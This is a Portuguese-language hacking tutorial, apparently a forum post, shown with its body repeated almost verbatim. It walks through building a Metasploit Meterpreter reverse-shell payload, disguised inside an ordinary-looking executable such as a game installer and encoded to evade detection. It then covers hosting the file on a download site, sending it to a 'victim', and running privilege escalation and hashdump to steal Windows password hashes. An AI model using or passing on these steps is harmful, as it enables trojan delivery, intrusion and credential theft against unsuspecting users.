Vamos simular que o windows XP ( sp3 ) tenha o IP - 192.168.1.5 ( Para ver o ip digite ipconfig no prompt de comando )
O backtrack 5 tenha o IP - 192.168.1.6 ( Para ver o ip digite ifconfig no terminal )
-
Começando:
1 - Abra o terminal do Backtrack 5
2
- O código abaixo para gerar o arquivo.exe que irá fazer a conexão
entre os dois computadores através da própria shell do linux.
Código:
# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 R |
msfencode -t exe -x Desktop/file.exe -k -o Desktop/realfile.exe -c
x86/shikata_ga_nai -c 5
.
O comando acima pode ser alterado, exemplo:
# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5050 R |
msfencode -t exe -x /etc/instalar.exe -k -o Desktop/instalarjogo.exe -c
x86/shikata_ga_nai -c 5
Feito isso, irá gerar o .exe, deixe ele de lado por enquanto.
Agora no terminal digite:
# msfconsole
De a sequência de comandos:
use exploit/multi/handler
set meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 1234 ( se vc já sabe usar, fica a escolha )
exploit
.
Deixa esse terminal de lado agora, e abra
o navegador, vá em algum site para hospedar o arquivo.exe que foi
gerado, megaupload ou depositfiles fica a sua escolha.
Depois
de hospedar envie para o windows xp ( vitima ), no momento que ela
executar veja agora o terminal no backtrack se a caso deu certo vai
aparecer o meterpreter >
-
meterpreter >
Ai será digitados uma sequência de comandos, veja as informações de cada uma delas até o hashdump.
ps
Veja o system32 - 1660
Agora digite:
migrate 1660
getuid
getsystem
getuid
sysinfo
hashdump
Os comandos são simples, como sysinfo mostrar a versão do windows e por ai vai, digite help para ver cada um.
Lentrius Credits
O backtrack 5 tenha o IP - 192.168.1.6 ( Para ver o ip digite ifconfig no terminal )
-
Começando:
1 - Abra o terminal do Backtrack 5
2
- O código abaixo para gerar o arquivo.exe que irá fazer a conexão
entre os dois computadores através da própria shell do linux.
Código:
# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 R |
msfencode -t exe -x Desktop/file.exe -k -o Desktop/realfile.exe -c
x86/shikata_ga_nai -c 5
.
O comando acima pode ser alterado, exemplo:
# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5050 R |
msfencode -t exe -x /etc/instalar.exe -k -o Desktop/instalarjogo.exe -c
x86/shikata_ga_nai -c 5
Feito isso, irá gerar o .exe, deixe ele de lado por enquanto.
Agora no terminal digite:
# msfconsole
De a sequência de comandos:
use exploit/multi/handler
set meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 1234 ( se vc já sabe usar, fica a escolha )
exploit
.
Deixa esse terminal de lado agora, e abra
o navegador, vá em algum site para hospedar o arquivo.exe que foi
gerado, megaupload ou depositfiles fica a sua escolha.
Depois
de hospedar envie para o windows xp ( vitima ), no momento que ela
executar veja agora o terminal no backtrack se a caso deu certo vai
aparecer o meterpreter >
-
meterpreter >
Ai será digitados uma sequência de comandos, veja as informações de cada uma delas até o hashdump.
ps
Veja o system32 - 1660
Agora digite:
migrate 1660
getuid
getsystem
getuid
sysinfo
hashdump
Os comandos são simples, como sysinfo mostrar a versão do windows e por ai vai, digite help para ver cada um.
Lentrius Credits